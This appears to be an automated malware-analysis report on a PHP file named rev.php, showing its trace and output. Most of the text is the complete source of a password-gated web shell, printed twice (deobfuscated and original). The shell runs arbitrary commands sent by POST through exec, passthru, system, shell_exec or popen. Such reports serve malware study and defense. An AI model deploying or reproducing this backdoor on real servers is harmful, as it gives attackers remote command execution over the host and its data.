PHP Malware Analysis

rev.php

md5: dafd9037e6ffbba7f81cdb4b5aa6914e

Jump to: 

Screenshot
Attributes
Environment

Execution

Input

Deobfuscated PHP code
<?php

error_reporting(E_ALL);
ini_set("display_errors", 1);
if (!isset($_POST['cmd']) || !isset($_POST['d']) || !isset($_POST['secret']) || md5($_POST['secret']) != "4866dd3a84a8a5a8ff09881338e24dce") {
    echo "./";
    exit;
}
$cmd = $_POST['cmd'];
$cwd = $_POST['d'];
if (isset($cwd)) {
    chdir($cwd);
}
function ex($in)
{
    $▖ = '';
    if (function_exists('exec')) {
        @exec($in, $▖);
        $▖ = @join("\n", $▖);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $▖ = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $▖ = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $▖ = shell_exec($in);
    } elseif (is_resource($f = @popen($in, "r"))) {
        $▖ = "";
        while (!@feof($f)) {
            $▖ .= fread($f, 1024);
        }
        pclose($f);
    } else {
        return "\nSorry,unable to execute command\n";
    }
    //	exit();
    return $▖ == '' ? "\nQuery did not return anything\n" : $▖;
}
if (preg_match("/^\\s*cd\\s*\$/", $cmd)) {
    echo getcwd();
} elseif (preg_match("/^\\s*cd\\s+(.+)\\s*(2>&1)?\$/", $cmd)) {
    if (is_dir($cwd)) {
        chdir($cwd);
    } else {
        echo "sh: cd: " . $cwd . ": No such file or directory\n";
    }
    preg_match("/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?\$/", $cmd, $match);
    if (is_dir($match[1])) {
        chdir($match[1]);
    } else {
        echo "sh: cd: " . $match[1] . ": No such file or directory\n";
    }
    echo getcwd();
} else {
    chdir($cwd);
    echo getcwd();
    echo ex('echo;' . $cmd);
    //header('dir: ' .getcwd());
}
Execution traces
data/traces/dafd9037e6ffbba7f81cdb4b5aa6914e_trace-1676244199.5981.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:23:45.495933]
1	0	1	0.000252	393512
1	3	0	0.000380	414272	{main}	1		/var/www/html/uploads/rev.php	0	0
2	4	0	0.000397	414272	error_reporting	0		/var/www/html/uploads/rev.php	2	1	32767
2	4	1	0.000412	414344
2	4	R			22527
2	5	0	0.000425	414304	ini_set	0		/var/www/html/uploads/rev.php	3	2	'display_errors'	1
2	5	1	0.000440	414376
2	5	R			''
			0.000474	335128
TRACE END   [2023-02-12 21:23:45.496292]


Generated HTML code
<html><head></head><body>./</body></html>
Original PHP code
<?php
error_reporting(E_ALL);
ini_set("display_errors", 1);
if(!isset($_POST['cmd']) || !isset($_POST['d']) || !isset($_POST['secret']) || md5($_POST['secret']) != "4866dd3a84a8a5a8ff09881338e24dce"){
  echo "./";
  exit();
}
$cmd = $_POST['cmd'];
$cwd = $_POST['d'];
if(isset($cwd)){
  chdir($cwd);
}
function ex($in) {
	$▖ = '';
	if (function_exists('exec')) {
		@exec($in,$▖);
		$▖ = @join("\n",$▖);
	} elseif (function_exists('passthru')) {
		ob_start();
		@passthru($in);
		$▖ = ob_get_clean();
	} elseif (function_exists('system')) {
		ob_start();
		@system($in);
		$▖ = ob_get_clean();
	} elseif (function_exists('shell_exec')) {
		$▖ = shell_exec($in);
	} elseif (is_resource($f = @popen($in,"r"))) {
		$▖ = "";
		while(!@feof($f))
			$▖ .= fread($f,1024);
		pclose($f);
	}else return "\nSorry,unable to execute command\n";
//	exit();
	return ($▖==''?"\nQuery did not return anything\n":$▖);
//	exit();
}
    if (preg_match("/^\s*cd\s*$/", $cmd)) {
       echo getcwd();
    } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
        if(is_dir($cwd)){
chdir($cwd);
        }else{
          echo "sh: cd: " .$cwd. ": No such file or directory\n";
        }
        preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
        if(is_dir($match[1])){
chdir($match[1]);
        }else{
          echo "sh: cd: " .$match[1]. ": No such file or directory\n";
        }
echo getcwd();
    } else {
        chdir($cwd);
        echo getcwd();
        echo ex('echo;' .$cmd);
//header('dir: ' .getcwd());
    }